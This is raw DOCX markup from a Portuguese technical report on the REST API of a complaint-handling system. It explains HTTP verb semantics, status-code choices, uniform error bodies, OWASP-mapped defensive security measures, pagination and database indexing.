      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PUT /api/denuncias/{id}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">substitui os dados descritivos do caso. É idempotente: repetir a chamada com o mesmo corpo produz o mesmo estado final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PATCH /api/denuncias/{id}/status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">altera um aspecto do recurso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">e acrescenta um evento à linha do tempo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Repetir a chamada acrescentaria outro evento, o que a torna não idempotente. Por isso ela não poderia ser um</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a semântica do verbo estaria mentindo sobre o efeito da operação.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O mesmo raciocínio separa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/fluxo/fila/atender</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de um hipotético</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Atender consome o topo da fila e muda o estado do caso. O RFC define como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">os métodos cuja semântica é essencialmente de leitura, e registra que essa garantia é o que permite que processos automatizados, como robôs de indexação e mecanismos de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">prefetch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, os acionem livremente (IETF, 2014a, seção 4.2.1). Expor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">atender</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como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deixaria um navegador consumir a fila de atendimento por acidente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE /api/denuncias/{id}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">204 No Content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e exige o parâmetro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. A exclusão é lógica, com anonimização, e a seção 5.2.2 detalha o porquê.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é usado para criação e devolve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">201 Created</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com o cabeçalho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apontando para o recurso criado (IETF, 2022, seção 15.3.2), que é o comportamento que a especificação define e que muitas APIs deixam de cumprir.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="71" w:name="códigos-de-status-o-catálogo-completo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.4 Códigos de status: o catálogo completo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34"/>
        <w:gridCol w:w="726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 normativa e tratamento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Recurso criado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9110, 15.3.2. Com cabeçalho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Operação bem-sucedida sem corpo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9110, 15.3.5. Exclusão de denúncia, membro e evidência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Corpo inválido (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@Valid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detalhes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">mapeia campo para mensagem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Parâmetro de rota ou de consulta inválido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idem, via</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ConstraintViolationException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JSON malformado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genérica; o trecho recebido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é devolvido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token, ou token inválido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9110, 15.5.2. Falta credencial de autenticação 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Token válido, perfil insuficiente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9110, 15.5.4. Mensagem genérica, sem revelar existência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Recurso inexistente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 padronizado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Conflito com o estado atual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Tratador declarado no</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GlobalExceptionHandler</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">e reservado para conflito de estado; nenhuma regra de negócio o dispara na versão atual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Requisição bem formada que viola regra de domínio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exemplo, status de destino inválido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 acima de 5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9110, 15.5.14,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">Content Too Large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Formato recusado pela assinatura do conteúdo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9110, 15.5.16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de requisições por origem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RFC 6585, seção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Falha não prevista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 sem detalhe interno, com código de rastreio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quatro decisões se escondem nesta tabela, e todas foram tomadas nesta fase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A distinção entre 401 e 403 foi corrigida.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Antes, uma requisição sem token recebia 403. É semanticamente errado: o 401 é a resposta para quando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the request has not been applied because it lacks valid authentication credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(IETF, 2014b, seção 3.1), enquanto o 403 é a recusa de quem já se identificou. A diferença não é acadêmica, porque o front-end usa exatamente essa distinção para decidir entre pedir login novamente e informar falta de permissão.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O 403 não diz se o recurso existe.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Responder 403 para um caso existente e 404 para um inexistente permitiria mapear a base por tentativa e erro, sem nunca conseguir ler nada. Seria um oráculo de existência entregue de graça a qualquer pessoa autenticada, e é a forma mais silenciosa do risco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API1:2023 Broken Object Level Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, 2023).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">413 e 415 não foram substituídos por um 422 genérico.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Arquivo grande e formato inválido caberiam em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entidade não processável</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e essa é a saída fácil. Mas um cliente que recebe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">413</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sabe que deve reduzir o arquivo e tentar de novo, enquanto 422 sugere que o pedido está conceitualmente errado. Código de status é a parte da API que o cliente lê sem abrir a documentação, e desperdiçá-lo é jogar fora comunicação de graça. Esses dois códigos foram implementados nesta fase por meio de duas exceções dedicadas,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ArquivoGrandeDemaisException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FormatoNaoSuportadoException</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, precisamente porque os critérios de aceitação da US28 os prometiam e o código ainda devolvia 422. Vale registrar que o RFC 9110 renomeou o 413 de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Payload Too Large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Content Too Large</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e é essa a denominação usada aqui.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O 500 parou de vazar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ex.getMessage()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mensagens de exceção carregam nome de tabela, de coluna, caminho de arquivo e trecho de SQL, que é material de reconhecimento para quem sonda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkStart w:id="72" w:name="X56a0ca6ccc81f390283c66bf6b7b2622cd3d11b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.5 Tratamento de erros: um corpo só para toda a API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toda falha sai pelo mesmo formato, produzido por um único</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@RestControllerAdvice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"2026-08-09T17:24:21.482"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"Bad Request"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"Dados invalidos"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"detalhes"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"Descreva o ocorrido com pelo menos 20 caracteres"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"tipo"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"Tipo de denuncia invalido"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Um corpo único tem uma consequência prática para quem consome a API: o cliente escreve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">um</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tratador de erro, e não um por endpoint. O campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detalhes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">só aparece quando há erro campo a campo, e é exatamente ele que o formulário React usa para posicionar cada mensagem embaixo do campo correspondente (seção 3.3.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No caso do 500, o corpo é reduzido ao mínimo e ganha um identificador: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 interno. Informe o codigo de rastreio ao suporte."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"rastreio"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"a3f91c47"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 suporte encontra o erro completo procurando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a3f91c47</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no log do servidor. Quem sonda a aplicação recebe oito caracteres aleatórios. É a fronteira entre log técnico e resposta de API, e ela reaparece na seção 5.5.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkStart w:id="73" w:name="segurança-da-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.6 Segurança da API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A segurança da API é tratada em profundidade na Parte 5. Aqui ficam registrados os mecanismos que pertencem ao desenho da própria interface HTTP, com o risco correspondente do catálogo OWASP (2023) quando aplicável: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1980"/>
        <w:gridCol w:w="2046"/>
        <w:gridCol w:w="2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garante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Risco endereçado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Autenticação por JWT assinado (HMAC-SHA)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JwtService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JwtAuthFilter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verificável sem estado de sessão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API2 Broken Authentication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Autorização por rota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Perfis distintos alcançam conjuntos distintos de rotas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API5 Broken Function Level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Autorização por campo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DenunciaMapper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MascaraUtil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endpoint devolve menos dado para quem pode ver menos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API3 Broken Object Property Level Authorization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CORS por lista explícita de origens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site de terceiros dispara requisição autenticada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API8 Security Misconfiguration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 de requisições por origem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denúncias e 20 logins por minuto, por IP, com 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API4 Unrestricted Resource Consumption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Sessão</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">stateless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há sessão para sequestrar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Senhas com BCrypt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puro nunca é persistido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 das recusas de rota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RespostasDeSeguranca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403 emitido pelo filtro também vira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Cabeçalhos de resposta em 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EvidenciaController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Content-Disposition: attachment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X-Content-Type-Options: nosniff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Inventário de endpoints publicado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rota esquecida fora do contrato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API9 Improper Inventory Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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RateLimitFilter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">roda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autenticação, o que é a ordem correta: força bruta de senha precisa ser barrada antes de chegar à verificação da senha.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:id="74" w:name="paginação-filtros-e-contrato-próprio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.7 Paginação, filtros e contrato próprio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A listagem devolve um envelope próprio, e não o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do Spring Data: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"conteudo"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"pagina"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"tamanho"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"totalItens"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"totalPaginas"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"temProxima"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do Spring serializa detalhes internos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pageable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unpaged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) que mudam entre versões da biblioteca. Publicá-lo transformaria uma atualização de dependência em quebra de contrato para quem consome a API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O envelope traz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">totalItens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totalPaginas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temProxima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que é o que um cliente precisa para saber se deve pedir a página seguinte sem tentar e falhar. A eficiência da consulta em si, incluindo filtros e índices, está na seção 3.1.8.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="75" w:name="consulta-eficiente-de-dados"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.8 Consulta eficiente de dados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O enunciado da fase cita, entre as capacidades esperadas do sistema consolidado,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">consultar dados de forma eficiente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A exigência não é teórica neste domínio: o canal federal equivalente registrou 657,2 mil denúncias em um único ano (MDHC, 2025), e a plataforma de ouvidoria do governo federal acumulava mais de seis milhões de manifestações em julho de 2023 (CGU, [s.d.]a). Cinco decisões respondem a isso, e todas foram tomadas nesta fase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O filtro é do banco, não do Java.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Status, tipo e UF viram parâmetros de consulta no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DenunciaRepository</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A alternativa comum, carregar a tabela e filtrar com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">stream()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, transfere para a memória da aplicação um trabalho que o banco faz com índice. Com 125 registros a diferença é invisível; com 125 mil, é a diferença entre uma consulta e uma parada do serviço.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A paginação também é do banco.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Pageable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chega até a consulta, de modo que o banco devolve 20 linhas, e não 125 mil linhas para a aplicação descartar 124.980.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Treze índices no modelo físico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, escolhidos pelas colunas que a aplicação realmente filtra e ordena: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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">criado_em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protocolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e os pares usados pela trilha de auditoria. Índice em coluna que ninguém consulta é custo de escrita sem retorno de leitura, e por isso eles não foram criados por precaução.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A linha do tempo é carregada junto, e de propósito.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O histórico usa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch = FetchType.EAGER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@OrderColumn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque toda tela que mostra uma denúncia mostra também sua linha do tempo. Deixá-la preguiçosa produziria o problema clássico de uma consulta por caso ao desenhar uma lista.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O agregado é calculado uma vez.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O relatório da Parte 4 percorre a base uma única vez por requisição, monta todos os recortes na mesma passagem e delega o cálculo a um serviço puro. Não há uma consulta por gráfico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um limite foi imposto de propósito: o tamanho máximo de página é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">100 itens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, decidido no servidor. Ele existe para que nenhum cliente, por engano ou por má intenção, peça a base inteira numa requisição, o que é a recomendação da OWASP contra consumo irrestrito de recursos (OWASP, 2023, API4). Esse limite produziu um defeito real durante a integração, descrito na seção 3.3.2: o front-end pedia 500, recebia 100 sem qualquer aviso, e o painel exibia 100 de 126 casos sem que ninguém percebesse (126 é o total daquele momento: as 125 denúncias da carga mais uma registrada durante o próprio teste). A correção foi paginar do lado do cliente até esgotar as páginas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="76" w:name="Xd98ed891be9170ae2f350057e6dc67187805a3d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.9 Documentação executável (OpenAPI 3 e Swagger UI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/swagger-ui.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">não é uma listagem estática. O botão</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Authorize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aceita o token emitido por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, e a partir daí qualquer rota protegida pode ser executada pelo navegador. Cada operação declara resumo, descrição, códigos de resposta possíveis e exemplos de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, anotados diretamente no controlador, o que mantém a documentação junto do código que ela descreve em vez de num arquivo que envelhece à parte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">É também o caminho mais rápido para verificar as afirmações deste documento sem instalar cliente HTTP nenhum. Autenticar como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">atendente@protege.gov.br</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e chamar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/auditoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolve 403 na própria tela, e autenticar como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auditor@protege.gov.br</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e repetir a chamada devolve 200 com a trilha, incluindo o registro da tentativa anterior.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Xafa7bc79bcf8b8042b38dddc428a32793fd9b59"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
